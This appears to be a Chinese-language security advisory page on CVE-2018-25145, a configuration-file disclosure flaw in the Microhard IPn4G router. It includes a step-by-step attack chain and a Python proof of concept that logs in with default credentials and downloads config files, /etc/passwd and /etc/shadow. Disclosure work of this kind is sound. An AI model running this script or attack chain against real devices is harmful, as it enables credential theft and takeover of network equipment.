CVE-2018-25145 CVSS 6.5 中危

CVE-2018-25145 Microhard IPn4G配置文件泄露漏洞

披露日期: 2025-12-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25145

漏洞类型

配置信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Microhard Systems IPn4G 1.1.0

漏洞概述

Microhard Systems IPn4G 1.1.0存在一处严重的配置文件泄露漏洞，攻击者可利用此漏洞在获取低权限认证后非授权访问并下载系统中存储的敏感配置文件。这些配置文件包含系统密码、网络配置、设备参数等关键信息。攻击者通过构造特定请求访问'/www'、'/etc/m_cli/'、'/tmp'等目录，可获取包括用户凭据、无线网络配置、WAN/LAN设置等敏感数据。成功利用此漏洞可能导致攻击者获得设备完全控制权，或利用获取的凭据横向移动至其他系统。该漏洞属于信息泄露类安全问题，CVSS评分为6.5，属于中危级别。攻击复杂度低，无需用户交互，但需要攻击者具备基本认证能力。

技术细节

该漏洞源于IPn4G设备的Web管理界面未对配置文件访问路径进行充分的权限验证。已认证用户可通过HTTP请求直接访问特定目录下的配置文件，例如通过构造类似'/www/config.ini'或'/etc/m_cli/settings.xml'的请求即可获取明文存储的配置数据。攻击者首先需要获取设备的有效用户凭据（低权限即可），然后使用该会话通过Web接口请求目标配置文件。设备端缺乏对文件路径的规范化处理和访问控制检查，导致路径遍历式访问成为可能。泄露的配置文件通常包含管理员密码、PSK密钥、RADIUS配置、VPN参数等敏感信息，攻击者可利用这些数据进行持久化控制或进一步攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标设备为Microhard IPn4G设备，确定管理界面访问地址

STEP 2

获取认证凭据

通过暴力破解、默认凭据或社工手段获取低权限用户账号密码

STEP 3

建立会话

使用有效凭据登录Web管理界面，建立认证会话

STEP 4

构造恶意请求

构造HTTP GET请求访问敏感配置文件路径，如/www/config.ini、/etc/m_cli/等

STEP 5

提取配置数据

下载包含系统密码、网络配置、WLAN密钥等敏感信息的配置文件

STEP 6

横向扩展

利用获取的凭据和配置信息进行持久化控制或横向移动攻击其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2018-25145 PoC - Microhard IPn4G Configuration File Disclosure
# Target: Microhard Systems IPn4G 1.1.0
# Authentication required: Low-privilege user account

target_ip = "192.168.1.1"  # Device IP address
username = "admin"
password = "admin"

# Create session and authenticate
session = requests.Session()
login_url = f"http://{target_ip}/cgi-bin/login.cgi"
login_data = {
    "username": username,
    "password": password
}

response = session.post(login_url, data=login_data)
if response.status_code != 200:
    print("[-] Authentication failed")
    exit(1)

print("[+] Authentication successful")

# Define sensitive configuration paths
config_paths = [
    "/www/config.ini",
    "/etc/m_cli/settings.xml",
    "/tmp/system.conf",
    "/etc/passwd",
    "/etc/shadow"
]

# Exfiltrate configuration files
for path in config_paths:
    url = f"http://{target_ip}{path}"
    response = session.get(url)
    if response.status_code == 200:
        print(f"\n[+] Found: {path}")
        print(response.text[:500])  # Print first 500 chars
    else:
        print(f"[-] Not accessible: {path}")

影响范围

Microhard IPn4G <= 1.1.0

防御指南

临时缓解措施

建议在网络边界防火墙上阻断对IPn4G设备Web管理界面的非授权访问，仅允许受信任的管理网段访问。临时禁用不必要的远程管理功能，使用本地控制台进行配置管理。监控设备访问日志，及时发现异常的文件访问行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表